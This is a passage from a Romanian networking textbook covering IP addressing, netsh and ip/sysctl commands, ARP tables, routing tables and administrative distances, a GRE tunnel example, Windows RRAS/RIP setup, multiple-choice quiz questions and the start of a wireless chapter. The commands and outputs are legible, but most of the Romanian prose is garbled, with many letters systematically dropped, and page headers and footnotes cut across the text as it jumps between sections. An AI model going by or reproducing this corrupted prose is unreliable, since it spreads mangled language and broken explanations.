# ip addr add dev eth0 192.168.38.11/24 broadcast 192.168.38.255 label eth0:0
# ip addr show label eth0:0
2: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0a:95:e2:04:d4 brd ff:ff:ff:ff:ff:ff
inet 192.168.38.11/24 brd 192.168.38.255 scope global eth0:0
group{
[parametri de grup]
host NUME1{
[parametri de host]
}
}
Atât î azul eţelelo a late ât şi pe t u ele wireless, Network and Sharing Center
at i uie u a di t e ele t ei lo aţii posi ile: public, private şi domain. A este lo aţii ep ezi tă
pa a et i e su t setaţi pe t u o i e al ulato e ulează Wi do s Vista sau Windows Server
2008, fiecare configurându-şi apa te e ţa la eţea p i t -u a di t e ele t ei lo aţii. Dife ite
p op ietăţi ale eţelei pot fi a ti ate sau deza ti ate auto at î fu ţie de tipul ei.
I pli it, toţi lie ţii su t e i ai u ei lo aţii de tip public. Pentru un astfel de calculator,
Windows Firewall este activ, serviciul de Network Discovery este op it, pa taja ea fişie elo şi a
i p i a tei este deza ti ată ia ge e a ea u ei hă ţi a eţelei Network Map) este
i dispo i ilă.
Câ d u al ulato este asig at u ei lo aţii de tip private serviciul de Nework Discovery şi
Network Map su t a ti ate. Pa taja ea fişie elo este op ită, da , sp e deose i e de lo aţia
public, pa taja ea poate fi a ti ată i di idual şi i depe de t pe fie a e al ulato .
Da ă u al ulato de i e e u al u ui do e iu Active Directory, el este automat
i lus î lo aţia de tip domain. Me ii a estei lo aţii e efi iază de ap o i ati a eeaşi
o figu aţie a şi ei di tipul de lo atie private, u e epţia ă pa a et ii Windows Firewall,
Network Discovery şi Network Map sunt determinate de politicile de grup ale domeniului
(Group Policy Settings).
114 | ‘ e ţ e l e L o a l e
toate o e iu ile lo ale, alătu i de supo tul pe t u LLTD Mapper şi LLTD Responder (descrise în
se ţiu ea 3.4.1).
Este posi ilă izualiza ea setă ilo a a sate pe t u o e iu ile di Network Connections.
Pentru aceasta, din fereastra Network Connections, se alege opţiu ea Advanced Settings din
meniul Advanced1:
1
În Windows Vista este posi il a e iul File, Edit, Vie , et . să u fie afişat i pli it. Î a est az, se
ţi e apăsată tasta Alt şi a esta a apă ea.
117 | A d r e s a r e a I P
Deoa e e o o figu aţie alte ati ă pe ite u ui al ulato să foloseas ă o o figu aţie IP
spe ifi ă şi detaliată î o e tul î a e u se dete tează u se e DHCP î eţeaua lo ală,
ea este utilă pe t u siste ele o ile a e i ulă î t e eţele, u ele u se e e DHCP ia altele
fă ă.
Pe t u IP u se poate spe ifi a o o figu aţie alte ati ă.
1
Totuşi, da ă u se e DHCP de i e eope aţio al, staţiile o e u ge la APIPA doa după e pi a ea
ti pului de î hi ie e a ulti ei o figu aţii o ţi ute de la a esta, de i t e e ea u se a fa e i sta ta eu.
122 | ‘ e ţ e l e L o a l e
În general, navigarea prin comenzile disponibile în netsh se poate face treptat, în sensul
ă la fie a e adăuga e a u ui pa a et u, da ă a esta u o stituie o o a dă o pletă,
netsh a afişa o listă u toţi pa a et ii supo taţi î o ti ua e, î p eu ă u o s u tă e pli aţie
a lo . “p e e e plu, da ă se do eşte izualiza ea tutu o o e zilo de tip show, se poate
i t odu e u ătoa ea o a dă:
PS C:\Users\Administrator> netsh interface ipv4 show
The following commands are available:
Commands in this context:
show addresses - Shows IP address configurations.
show compartments - Shows compartment parameters.
show config - Displays IP address and additional information.
show destinationcache - Shows destination cache entries.
show dnsservers - Displays the DNS server addresses.
show dynamicportrange - Shows dynamic port range configuration parameters.
1
E pli aţia pe t u a est o po ta e t stă î faptul ă o staţie a e e u ge la APIPA o a fa e pe t u ă
este setată să o ti ă o o figu aţie auto ată şi u a euşit a est lu u. De i, p a ti , î lo ui ea o figu aţiei
APIPA u ea p i DHCP se fa e deoa e e o figu aţia p i a ă a e p io itate î faţa elei alte ati e.
2
http://tools.ietf.org/html/rfc3927
3
http://tools.ietf.org/html/rfc4862
123 | A d r e s a r e a I P
“e o se ă ă se pot afişa la a est pas o figu aţiile de pe fie a e i te faţă, se e ele DN“
o figu ate, statisti i, ute, o e iu ile a ti e şi o ultitudi e de alte i fo aţii.
Î e e plul u ăto se do eşte sta ili ea u ei o figu aţii stati e pe o a u ită i te faţă.
Pe t u a easta, este e esa să se uleze î tâi o o a dă show a e să listeze i te feţele de
eţea î p eu ă u u e ele lo de o di e:
PS C:\Users\Administrator> netsh interface ipv4 show interfaces
Idx Met MTU State Name
--- --- ----- ----------- -------------------
1 50 4294967295 connected Loopback Pseudo-Interface 1
16 40 1500 connected Wireless Network Connection
10 30 1500 disconnected Local Area Connection
12 20 1500 connected Local Area Connection 2
14 20 1500 connected Local Area Connection 3
17 40 1500 disconnected Local Area Connection 4
Co a da de ai sus etu ează i fo aţii detaliate desp e o figu aţia IP, TCP, DN“,
ute, pa a et ii ai p oto olului IP şi dife ite alte apa ilităţi ale i te feţei.
O o a dă utilă pe t u afla ea ad ese IP e te e de pe o staţie di t -o eţea lo ală a e
foloseşte o ad esă p i ată1 este ea de ai jos, e p elu ează ezultatul u ei pagi i etu ate
în urma unei cereri HTML:
PS C:\> $webc = New-Object system.net.webclient
PS C:\> $webc.DownloadString("http://checkip.dydns.com") -replace "[^\d\.]”
78.3.73.215
1
De reţi ut faptul ă o o a dă p e u ip o fig sau alte o e zi PowerShell e a alizează i te feţele
a afişa ad esa o figu ată pe i te faţă, a e poate fi o ad esă p i ată, hia da ă staţia a e o e ti itate la
Internet prin intermediul unui gateway.
125 | A d r e s a r e a I P
1 3 ms 38 ms 8 ms mygateway1.ar7 [192.168.1.1]
2 30 ms 26 ms 25 ms 172.29.252.46
3 27 ms 25 ms 25 ms 172.29.32.153
4 31 ms 39 ms 35 ms gtr10-gtr11.ip.t-com.hr [195.29.240.97]
5 41 ms 41 ms 41 ms mil8-hpt-11.mil.seabone.net [195.22.196.81]
6 143 ms 143 ms 143 ms ash2-new11-racc3.new.seabone.net [195.22.216.207]
7 155 ms 155 ms 156 ms g2-12-bas2.dce.yahoo.com [206.223.115.2]
8 157 ms 155 ms 150 ms ae1-p141.msr1.re1.yahoo.com [216.115.108.19]
9 158 ms 156 ms 156 ms ge-9-3.bas-a1.re4.yahoo.com [216.39.49.3]
10 153 ms 153 ms 154 ms yahoo.com [206.190.60.37]
Trace complete.
126 | ‘ e ţ e l e L o a l e
A‘P ep ezi tă atât u ele u ui utilita ât şi al unui protocol. Protocolul ARP (Address
Resolution Protocol este folosit pe t u a e ţi e aso ie ea di t e ad esele IP di eţeaua
lo ală şi ad esele fizi e, MAC ale i te feţelo , pe t u a se putea ealiza ad esa ea la i elul î
interiorul unui LAN. Utilitarul arp ofe ă posi ilitatea de a izualiza şi a odifi a a este aso ie i.
Vizualiza ea aso ie ilo e o ate p i p oto olul A‘P este utilă pe t u ide tifi a ea u o
aso ie i i o e te. “p e e e plu, î azul o e tă ii u o aşi i i tuale p i t -o eţea lo ală,
utilitarul arp poate i di a o e oa e p i faptul ă ele două aşi i i tuale foloses a eeaşi
ad esă MAC. Tot p i a aliza ea aso ie ilo se poate i di a şi p o a ilitatea u ui ata de tip
ARP poisoning, î a e ata ato ul i t odu e fo ţat î ta elele A‘P ale staţiilo p op ia ad esă
MAC, de egulă aso iată u ad esa IP a gateway-ului, interceptând astfel traficul destinat în
afa a eţelei.
Mai jos este exemplificat rezultatul comenzii arp –a pe t u o e o ie A‘P supusă u ui
atac de tip ARP poisoning. “e o se ă ă ad esele IP . . . , . . . şi . . .
su t toate aso iate a eleiaşi ad ese fizi e, -19-5b-22-31-a3. Într-u astfel de az, da ă u a
di t e ad esele . . . sau . . . apa ţi e ata ato ului ia . . .1 este
adresa gateway-ului, a esta a i te epta toate pa hetele t i ise de la staţia u e tă î
e te io ul eţelei lo ale î od o al, sp e gateway).
PS C:\Users\Administrator> arp -a
Interface: 192.168.1.2 --- 0x10
Internet Address Physical Address Type
192.168.1.1 00-19-5b-22-31-a3 dynamic
192.168.1.50 00-18-3a-78-99-f0 dynamic
192.168.1.52 00-19-5b-22-31-a3 dynamic
192.168.1.53 00-19-5b-22-31-a3 dynamic
192.168.1.64 00-1d-60-1c-b5-35 dynamic
[...]
4. Se poate folosi acum comanda ipconfig /all pe t u a e ifi a oua o figu aţie. Da ă s-a
ealizat u su es o ta ta ea se e ului DHCP, t e uie să fie izi il şi i te alul de ti p pe t u
a e o figu aţia auto ată este alidă alo ile Lease Obtained şi Lease Expires).
D ept ezultat, su t o figu ate u alo i stati e: ad esa IP, as a de eţea, default
gateway-ul, se e e DN“ p i ipal şi se u da şi se e e Wi s. Co figu aţia o pletă poate fi
e ifi ată de la p op ietăţile o e iu ii, TCP/IP Properties, la categoria Advanced. Aici pot fi
izualizate o figu aţiile IP, DN“ şi WIN“.
Din moment ce PowerShell lu ează u tipu i de date i e defi ite, este i po ta t de
e a at tipu ile u o pa a et i folosiţi î s iptul de ai sus:
128 | ‘ e ţ e l e L o a l e
Î tre ări
1. Ca e di t e ad esele de ai jos ep ezi tă o ad esă alidă de staţie:
150.100.2.8/25
177.1.1.192/26
195.3.15.8/22
200.1.1.63/27
4 Rutarea în Internet
If ou asked a hu d ed people alki g do the st eet...I ould et you that 90 of them, if not
of the , ould ask, 'What's a oute ?'
Stewart Wolpin
Cine este...
Len Bosack și Sandy Lerner sunt co-fo dato Cis o “ ste s. Bosa k și Le e su t
creatorii primului router multi-protocol, dispozitiv care s-a dovedit un succes comercial.
Î , Bosa k și Le e au pă ăsit Cis o și au â dut a ţiu ile pe t u o aloa e
esti ată de de ilioa e de dola i.
Protocoalele rutate sunt acele protocoale responsabile pentru asigurarea unui mod de
ide tifi a e a e tităţilo e pa ti ipă î I te et p i sta ili ea u ei s he e de ad esa e e
t e uie să asigu e u i itatea şi ie a hiza ea ad eselo .
Î uta ea u ute lassfull p o esul este dife it, şi a u e ad esa desti aţie e t asă di
antetul unui pachet ajuns la router a fi ai î tâi o pa ată u , şi î azul î a e e ai
i ă de a fi o pa ată u 128, determinându-se astfel lasa de ad ese şi i pli it as a
de eţea. Di a est pu t p o esul este si ila u el di uta ea classless, adi ă se a efe tua
o ope aţie de „şi logi î t e ad esa desti aţie şi as a eţelei, ezultatul u â d a fi
compa at u ad esa de eţea o ţi ută î ută.
Odată u ăspâ di ea ută ii lassless a apă ut lasifi a ea utelo î fu ţie de tipul
desti aţiei. Astfel sunt rute de tip nod (sau rute host) şi rute de tip rețea. Rutele host o ţi
i fo aţii doa desp e o si gu ă staţie, adi ă as a de eţea este / . Odată u eşte ea
I te etului, şi i pli it a di e siu ii ta elelo de uta e, a es ut şi p esiu ea de a ag ega ât
ai ult utele, p e u şi a se e u ţa la utele de tip od. Cu toate a estea, dato ită
modului de i se a e a utelo , şi de i dato ită p o o ă ii utelo de tip od la î eputul ta elei
de rutare, acestea având prefixul maxim, rutele host ai su t î ă folosite pe t u u ele
opti iză i de t afi , ai ales pe routerele de la periferia Internetului.
Al t eilea ite iu de lasifi a e a utelo este î fu ţie de odul de o e ta e, ia ele
două tipu i de ute su t: rutele direct conectate şi rutele gate a ătre rețele dista te .
‘utele di e t o e tate su t ute ăt e eţele î a e routerul în auză a e o i te faţă, şi î
majoritatea cazurilor aceste rute sunt automat introduse în tabela de rutare de sistemul de
ope a e î o e tul o figu ă ii şi a ti ă ii i te feţei espe ti e. ‘utele di e t o e tate u
o ţi , î ge e al, ad esa u ăto ului hop, a â d spe ifi ată doa i te faţa de ieşi e di
router. Astfel, utele di e t o e tate su t si gu ele ute alide a e pot a ea spe ifi ată a
i te faţă de ieşi e o i te faţă ultia ess ge Ethernet , fă ă a e esita p e iza ea ad esei
u ăto ului hop.
O a pat a lasifi a e a utelo se fa e î fu ţie de ediul de a es la eţea, a â d astfel
rute pe medii punct la punct şi rute pe medii multiacces. ‘utele ăt e o eţea o e tată pe o
legătu ă pu t la pu t pot fi spe ifi ate o i p i i te faţa de ieşi e di router, ori prin adresa
u ăto ului hop, o i p i a ele. ‘utele pe edii ultia es su t spe ifi ate doa p i ad esa
u ăto ului hop, i te faţa de ieşi e efii d sufi ie tă.
Din punctul de vedere al unui router, două edii de t a s isie a ope ă a ea ajo itate
a utelo ; altfel spus, două tipu i a u e de i te feţe su t ult ai popula e de ât estul. Cele
două tipu i de i te feţe su t i te feţele Ethe et şi ele se iale. Ethe et pe ite t a s isia
peste un mediu multiacces, în vreme ce inte faţa se ială este pu t la pu t. Alte i te feţe
pu t la pu t destul de ăspâ dite su t ele de fi ă opti ă şi ele I“DN.
U tip spe ial de ută este uta i pli ită.
O ruta i pli ită rută default este ruta spre care se trimit toate pachetele pentru care nu
se u oaşte o desti aţie spe ifi ă.
Altfel spus, uta i pli ită este uta a e se pot i eşte u toate desti aţiile, a â d î pa tea
de ad esă de eţea di ută u spaţiu de ad ese e up i de toate ad esele IP. A est spaţiu de
adrese este 0.0.0.0/0 şi, deşi deseo i uta i pli ită este de u ită a uta u de ze o sau
quad-ze o oute, a a te isti a disti ti ă a a estei ute se află î as a de lu gi e ze o.
E istă situaţii î a e pot e ista ai ulte ute i pli ite î t -o ta elă de uta e. În tabela
de uta e de ai jos, ulti ele două ute su t două ute i pli ite.
Ad esă eţea Mas ă Next hop I te faţă
......
0.0.0.0 /0 194.230.5.65 S0
0.0.0.0 /0 - S1
4-2: Ta elă de rutare u două rute i pli ite
136 | ‘ e ţ e l e L o a l e
Da ă a ele ute apa î ta ela de uta e, este e ide t ă niciun pa het u a aju ge să
fie prelucrat de cea de-a doua ută i pli ită, toate pa hetele fii d a eptate de p i a.
Deza ti a ea u ei i te feţe, a u a e a î hide ii ad i ist ati e sau a întreruperii
legătu ii de i el fizi sau de i el legătu ă de date, a e a ezultat î lătu a ea tutu o utelo
e foloses espe ti a i te faţă a i te faţă de ieşi e di router. Astfel, î a se ţa elei de-a
doua ute i pli ite î azul deza ti ă ii i te feţei “ , toate pa hetele a e a fi fost utate p i
p i a ută i pli ită a u a să fie ig o ate.
În concluzie, într-o ta elă de uta e e istă o si gu ă ută i pli ită a ti ă, da pot fi
precizate mai multe rute default în scopuri de backup.
Ultima clasifi a e este şi ea ai ele a tă î p eze t. Po i d de la i fo aţia pe aza
ă eia su t o st uite utele, disti ge rutele statice de rutele dinamice. A eastă lasifi a e
se efe ă doa la utele gate a , deoa e e utele di e t o e tate su t i t oduse automat în
tabela de rutare.
Dista ţa
Tip ută
ad i ist ati ă
Direct conectată 0
‘ută stati ă 1
‘ută ag egată 5
BGP 20
EIGRP 90
IGRP 100
OSPF 110
IS-IS 115
RIP 120
ODR 160
iBGP 200
4-3: Valorile dista țelor ad i istrati e
1
http://tools.ietf.org/html/rfc1058
139 | R u t a r e a î n I n t e r n e t
1
http://tools.ietf.org/html/rfc4271
141 | R u t a r e a î n I n t e r n e t
sau sysctl:
cuirass:~# sysctl -a | grep ip_forward
net.ipv4.ip_forward = 0
cuirass:~# sysctl -w 'net.ipv4.ip_forward=1'
net.ipv4.ip_forward = 1
cuirass:~# sysctl -a | grep ip_forward
net.ipv4.ip_forward = 1
142 | ‘ e ţ e l e L o a l e
Î ta elul de ai sus e istă o ută di e t o e tată link şi o ută i pli ită. ‘uta di e t
o e tată este i te faţa eth0 p i a e siste ul se o e tează la eţeaua lo ală. ‘uta i pli ită
foloseşte a gateway 172.16.68.2.
În exemplul de mai sus s-a adăugat o ută de tip host ăt e staţia u ad esa IP
. . . şi o ută de tip eţea ăt e eţeaua . . . .
Î e e plul u ăto se adaugă o ută i pli ită:
cuirass:~# ip r a default via 172.16.68.4
cuirass:~# ip r l
192.168.38.100 via 172.16.68.2 dev eth0
192.168.38.0/24 via 172.16.68.2 dev eth0
172.16.68.0/24 dev eth0 proto kernel scope link src 172.16.68.128
default via 172.16.68.2 dev eth0
1
http://tools.ietf.org/html/rfc1631
2
http://tools.ietf.org/html/rfc1918
145 | R u t a r e a î n I n t e r n e t
10.0.0.2 64.6.8.13
141.85.37.1 141.85.37.1
22 22
Internet
10.0.0.3 64.6.8.13
64.6.8.13
141.85.37.1 141.85.37.1
52108 2003
10.0.0.3 22 22
4.6.3 Tunelare
O eţea p i ată i tuală VPN – Virtual Private Network ep ezi tă o odalitate de
asigu a e a u ei o e iu i sigu e peste o i f ast u tu ă pu li ă. P i ipalele teh ologii e
permit stabilirea unei astfel de o e iu i su t ipta ea şi tu ela ea. Odată u apa iţia
eţelelo p i ate i tuale de i el , o po e ta de ipta e a fost a a do ată, si gu a
a a te isti ă u i e sală a soluţiilo de VPN ă â â d tu ela ea.
P i ipalul s op al tu elă ii î tr-o eţea i tuală este de a as u de fă ă a alte a atât
ide titatea su sei ât şi a desti aţiei faţă de oute ele de pe pa u s, oute e e apa ţi
i f ast u tu ii pu li e. Da ă s-a apela la o t a slata e de ad esă, i fo aţiile o igi ale u a fi
accesi ile de ât se e ului de t a slata e de ad esă.
Î azul tu elă ii a tetul i iţial al pa hetului este păst at ealte at, ataşâ du-se un nou
a tet e a a ea a ad esă su să ad esa apătului lo al al tu elului, ia a ad esă desti aţie
adresa celuilalt capăt al tu elului.
Cel ai adesea tu ela ea se ealizează la i elul eţea p i tu ela ea t afi ului IP p i t -
un tunel IPv4, precum în cazul VPN, sau tunelarea unui alt protocol rutat, spre exemplu
tu ela ea t afi ului IP peste o i f ast u tu ă IP tunel 6to4).
“e poate folosi tu ela e şi î azul t afi ului de i el legătu ă de date, ea ai î tâl ită
etodă de tu ela e fii d tu ela ea dot1q, folosită de I“P î azul î a e a esta ofe ă
o se a ea i fo aţiilo de VLAN di eţelele lie ţilo .
O catego ie apa te de tu ela e o ep ezi tă tu ela ea de i el , folosită sp e e e plu î
arhitecturile de IP MPLS.
A â d î ede e ă p i ipalul s op al tu elă ii IP peste IP este a ela de a ofe i se u itate,
t e uie să ăspu de la î t e a ea:
Î e ăsu ă se o ţi e u plus de se u itate folosi d tu ela ea, atâta e e ât
i fo aţiile o igi ale se află î o ti ua e î ad ul o igi al?
‘ăspu sul la a eastă î t e a e ţi e de ap e ie ea olu ului foa te a e de date e
trebuie comutate în nucleul Internetului. Valoa ea foa te idi ată a t afi ului dete i ă a
o i e p elu a e adiţio ală a ad elo să ai ă o se i ţe se ifi ati e pe t u s ala ilitatea
eţelei. Altfel spus, deşi teo eti este posi ilă sele ta ea foa te p e isă doa a pa hetelo de
149 | R u t a r e a î n I n t e r n e t
1
http://tools.ietf.org/html/rfc1701
150 | ‘ e ţ e l e L o a l e
Reţea A Reţea B
Adresă reţea 172.16.68.0/24 Adresă reţea 10.38.0.0/16
Adresă internă R1 172.16.68.1 Adresă internă R1 10.38.0.1
Adresă externă R1 141.85.37.178 Adresă externă R1 141.85.37.1
Adresă sistem de test 172.16.68.128 Adresă sistem de test 10.38.6.123
‘uta ăt e eţeaua B este i te ediată de i te faţa i tuală netb aso iată tu elului G‘E.
La fel, pe t u eţeaua B se eează tu elul eta şi i te faţa u a elaşi u e:
root@csr:~# ip t a neta mode gre remote 141.85.37.178 local 141.85.37.1 ttl 255
root@csr:~# ip l set neta up
root@csr:~# ip a a 10.38.0.1 dev neta
root@csr:~# ip r a 172.16.68.0/24 dev neta
Î a est o e t, deşi aflate î eţele p i ate, staţiile pot comunica unele cu celelalte. Prin
tu elul folosit toate pa hetele de la staţiile di eţeaua A o aju ge la staţiile di eţeaua B. O
aptu ă de pa hete folosi d tcpdump a e u ăto ul o ţi ut:
22:07:36.819507 IP 141.85.37.178 > 141.85.37.1: GREv0, length 88: IP 172.16.68.128 >
10.38.6.123: ICMP echo request, id 41995, seq 1, length 64
22:07:36.820140 IP 141.85.37.1 > 141.85.37.178: GREv0, length 88: IP 10.38.6.123 >
172.16.68.128: ICMP echo reply, id 41995, seq 1, length 64
22:07:37.827154 IP 141.85.37.178 > 141.85.37.1: GREv0, length 88: IP 172.16.68.128 >
10.38.6.123: ICMP echo request, id 41995, seq 2, length 64
22:07:37.827657 IP 141.85.37.1 > 141.85.37.178: GREv0, length 88: IP 10.38.6.123 >
172.16.68.128: ICMP echo reply, id 41995, seq 2, length 64
Majo itatea eţelelo foloses e hipa e te dedi ate î a est s op, al ută ii. A estea
ep ezi tă soluţii hardware e fu ţio ează u p op iile siste e de ope a e Cis o, Ju ipe ,
et şi su t desti ate eţelelo de ă i e edie şi a e.
Windows Server 2008 ofe ă o soluţie software pentru rutare prin intermediul serviciilor
grupate sub denumirea de Routing and Remote Access. Din punct de vedere hardware,
si gu ele odifi ă i e esa e pe t u a i ple e ta u p o es de uta e folosi d Windows
Server 2008 su t u a sau ai ulte plă i de eţea supli e ta e.
“oluţiile software pe t u uta e ep ezi tă o alte ati ă ia ilă pe t u azu ile î a e u
este e esa ă i ple e ta ea u o soluţii dedi ate: izola ea a i i seg e te de eţea sau
folosirea serverului ca gateway spre Internet pentru o eţea lo ală de i i di e siu i. Î azul
în care Windows Server 2008 este i stalat pe u siste u ol de gate a , e istă opţiu ea de a
ula şi se i iul de NAT Network Address Translation) pentru a oferi conectivitate în exterior
u ei eţele a e folosește ad ese p i ate p i t -o si gu ă ad esă pu li ă.
P i ipiul de fu ţio a e a p o edeului de uta e î Windows Server 2008 este a elaşi a şi
în cazul echipamentelor dedicate: deciziile sunt luate pe baza rutelor din tabela de rutare. În
plus, serviciul de Routing and Remote Access poate fi o figu at atât pe t u ute stati e ât şi
pe t u ute di a i e, o ţi ute p i i te ediul u ui p oto ol de uta e. I t u ât Windows
Server 2008 este o eput a o soluţie de uta e pe t u eţele de di e siu e i ă, p oto olul
de rutare suportat este RIP (Routing Internet Protocol).
Pentru a putea folosi serviciul de rutare în Windows Server 2008 este e esa ă adăuga ea
acestuia ca rol al serverului, din Server Manager. Pentru aceasta, de la linkul Add roles se
sele tează Network Policy and Access Services. Î o ti ua e, î ai te de i stala e, se ofe ă
opţiu ea de a sele ta su o po e te ale a estui ol. Pe t u uta e este e esa ă sele ta ea
Routing and Remote Access Services, cu ambele sale componente: Remote Access Service şi
Routing (figura 4-6).
Pentru a putea configura rutarea prin RRAS trebuie activat întâi serviciul. Acestea pot fi
realizate prin consola Server Manager. După i stala e, Routing and Remote Access poate fi
găsit su Network Policy and Access Services în cadrul rolurilor serverului.
Co figu a ea i iţială şi po i ea se i iului se fa e p i selectarea Routing and Remote
Access şi a esa ea e iului More Actions di pa oul de a ţiu i u ată de alege ea opţiu ii
Configure and Enable Routing and Remote Access.
Ate ţie, nu se poate activa sau configura serviciul de rutare pe Windows Server 2008 atât
ti p ât aşi a pe a e este i stalat se i iul ealizează pa taja ea u ei o e iu i la I te et.
Înainte de a porni configurarea conform descrierii de mai sus, trebuie dezactivat ICS (Internet
Connection Sharing) pentru toate conexiunile, din interfaţa Net o k Co e tio s.
152 | ‘ e ţ e l e L o a l e
3. “e sele tează ‘IP di listă după a e este adăugat automat un nou nod denumit RIP în cadrul
versiunii IP selectate. Selectarea lui RIP pentu IPv4, spre exemplu, nu va configura automat
folosi ea ‘IP şi pe t u IP . Da ă se do eşte folosi ea ad eselo IP , ‘IP t e uie adăugat
explicit pentru acestea.
2. La apăsa ea uto ului OK, este afişată fe east a de p op ietăţi a i te feţei sele tate figu a
4-15).
3. Pagi a de p op ietăţi ge e ale ofe ă posi ilitatea sele tă ii e siu ii de ‘IP folosite atât î
esajele a eptate ât şi î ele t i ise. Folosi ea e siu ii i pli ă o se ie de li ită i
supli e ta e da este e esa ă da ă alte e hipa e te di eţea o supo tă doa pe a easta.
4. Pagina de securitate permite seta ea u o pa a et i legaţi de a epta ea utelo . E istă
posibilitatea de a accepta toate rutele, sau de a accepta sau ignora rutele dintr-un anumit
interval.
5. “etă ile legate de e i ii u a e se efe tuează s hi ul de ute i lud posi ilitatea de a folosi
mesaje multicast (implicit) sau a celor unicast pentru a contacta anumiti vecini (fie în locul
mesajelor multicast, fie î p eu ă u ele .
6. Pagi a de p op ietăţi a a sate pe ite odifi a ea u o pa a et i a f e e ţa de t i ite e a
a tualiză ilo , a ti a ea sau deza ti a ea u o fa ilităţi a split-horizon sau poison-reverse, etc.
156 | ‘ e ţ e l e L o a l e
După alida ea o figu ă ii, i te faţa a apă ea î lista i tefeţelo a ti e pe t u ‘IP. Pot fi
adăugate o i âte alte i te feţe epetâ d a eeaşi p o edu ă.
Mo ito iza ea a ti ităţii de uta e se ealizează di a eeaşi o solă ad i ist ati ă. “p e
e e plu, pe t u a izualiza o listă a e i ilo a e ulează ‘IP, se poate sele ta odul ‘IP di
u a di t e atego iile IP sau IP şi apoi se poate alege opţiu ea Show Neighbors. Starea
i te feţelo i luse î p o esul de uta e poate fi izualizată p i odul General din cadrul
p oto olului IP o espu zăto . De ai i poate fi izualizată ta ela de rutare pentru fiecare
i te faţă, p i sele ta ea u eia şi alege ea opţiu ii Show IP Routing Table din meniul
contextual.
157 | R u t a r e a î n I n t e r n e t
Î eţeaua dată, pe t u ele două eţele u s it hu i s-au folosit adrese private, astfel R1
şi R3 o asigu a t a slata e de ad esă u sup aî ă a e PAT . “e a o side a ă ta elele
A‘P di eţea au fost o figu ate static pentru toate desti aţiile. Des ieţi a tetele pa hetelo
apă ute î eţea î azul î a e A fa e o si gu ă e e e HTTP ăt e staţia E.
Rezolvare:
Pe t u topologia de ai sus p i ipala p o le ă o ep ezi tă asigu a ea a esi ilităţii
staţiei E di e te io ul eţelei private.
Da ă a fi fost dispo i il u eze o de ad ese pu li e pe t u a ealiza t a slata ea de
ad esă, soluţia a fi fost i ple e ta ea “NAT static NAT): definirea unei asocieri de
translatare pe routerul R3 între una dintre adresele publice din rezer o şi ad esa p i ată a lui
E. Pe t u p o le a de faţă, u dispu e de ad ese pu li e supli e ta e, t a slata ea fii d
ealizată p i sup aî ă a ea ad esei pu li e <R3, e0>.
Routerul R3 asigu ă t a slata ea u sup aî ă a e, si gu a opţiu e î a est az fiind
implementarea port forwarding, adi ă ea ea pe R3 a u ei aso ie i î t e pe e hea ad esă
pu li ă a lui R3, po t şi pe e hea ad esă p i ată a lui E şi po t. “p e e e plu, da ă se do eşte
ula ea u ui se i iu de e pe staţia E, în serviciul de nume a fi pu li ată aso ie ea di t e
u ele do e iului fie a esta .test. o şi ad esa pu li ă a lui ‘ adi ă IP R3(e0)).
Apoi este defi ită pe R3 asocierea de translatare: <IP R3(e0), 80> – <IP E, 80>. În acest
o e t, o i e e e e p i ită de R3 pe portul 80 u a ai fi t e ută ăt e i elul apli aţie
i lusi oute ul a putea ula u se e de e lo al , i a fi t a slatată şi t i isă ăt e staţia
E.
‘e e i d la p o le a de faţă, dato ită populă ii stati e a ta elelo A‘P pe t u toate
desti aţiile u o ai e ista pa hete de e e e/ ăspu s A‘P. Popula ea stati ă a ta elelo
158 | ‘ e ţ e l e L o a l e
Î tre ări
1. Existenţa unei intrări în tabela de rutare de forma 141.85.37.0/24 141.85.254.37
înseamnă:
trimite toate pachetele e ite di eţeaua . . . / ăt e . . .
t i ite toate pa hetele e ite ăt e eţeaua . . . / ăt e . . .
t i ite toate pa hetele e ite di eţeaua . . . / , sau di o i e altă su eţea
up i să î a est spaţiu de ad ese, ăt e . . .
t i ite toate pa hetele e ite ăt e eţeaua . . . / , sau ăt e o i e altă
su eţea up i să î a est spaţiu de ad ese, ăt e . . .
4. Către ce interfaţă va fi rutat un pachet destinat pentru 171.15.68.0 dacă tabela de rutare
este cea de mai jos:
Ad esă eţea Mas ă Next hop I te faţă
171.15.63.0 /24 172.17.0.9 S0
171.15.64.0 /23 - S1
0.0.0.0 /0 194.230.5.65 S2
va fi trimis pe S0
va fi trimis pe S1
va fi trimis pe S2
nu va fi rutat
5. Fie două routere. Primul are următoarele adrese asignate: 7.1.1.1/24 – S0 şi 7.1.3.1 – S
1, al doilea 7.1.3.2/24 – S0 şi 7.1.2.1 – S1. Care este numărul minim de rute ce trebuie adăugat
pe routerul 1 pentru a asigura comunicaţia între 7.1.1.0/24 şi 7.1.2.0/24?
7.1.2.1 / 24 S1
tot ce e mai sus plus: 7.1.2.1 /24 S0
tot ce e mai sus plus: 0.0.0.0 /0 S1
doar: 0.0.0.0 /0 S1
161 | R u t a r e a î n I n t e r n e t
9. Fie NET1, o reţea direct conectată la un router. Acest router rulează RIP şi OSPF şi
primeşte de la un router adiacent în cadrul procesului de actualizare informaţii despre NET1,
atât prin RIP, cât şi prin OSPF. Câte rute către NET1 vor fi în tabela de rutare la încheierea
procesului de actualizare?
0
1
2
3
5 Wireless
„The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very
long cat. You pull the tail in New York, and it meows in Los Angeles. The wireless is the same,
only without the cat.
Albert Einstein
Cine este...
Nikola Tesla este u i e tato și u o de știi ţă î do e iul ele t i ităţii. Mai ulţi
iog afi o te po a i îl o side ă pe Tesla „o ul a e a i e tat se olul . Pate tele și
descoperirile teoretice ale lui Tesla au format baza sistemelor de curent electric alternativ.
Î a de o st at pe t u p i a oa ă posi ilitatea o u i aţiei fă ă fi u de adio .
Este o side at des ope ito ul o u i aţiei fă ă fi .
Lumină vizibilă
430 T H z-750 T H z
5-1: Be zi de fre e ță
Dista ţa de p opaga e
U dele de f e e ţa joasă su t a so ite foa te puţi î at osfe ă, de a eea ele pot
st ă ate dista ţe foa te a i. Cu ât eşte f e e ţa u ei u de, u atât a easta este a so ită
ai ult î at osfe ă. De ase e ea, u dele joase p ezi tă o apa itate de penetrare a
materialelor foarte mare, fiind cu atât mai potrivite pentru transmisiile de date. Spre
deose i e de a estea, u dele de f e e ţe a i ti d să sufe e efle ii şi ef a ţii pe di e se
sup afeţe.
Co luzio â d, da ă se foloseşte a da de . GHz, a so ţia î at osfe ă o să fie ai
i ă, efle ia se alului de ase e ea, de i dista ţa posi ilă de p opaga e o să fie ai a e.
Lăţi ea de a dă
165 | W i r e l e s s
Costul echipamentelor
Costul e hipa e telo e fu ţio ează i a da de GHz su t se si il ai s u pe de ât
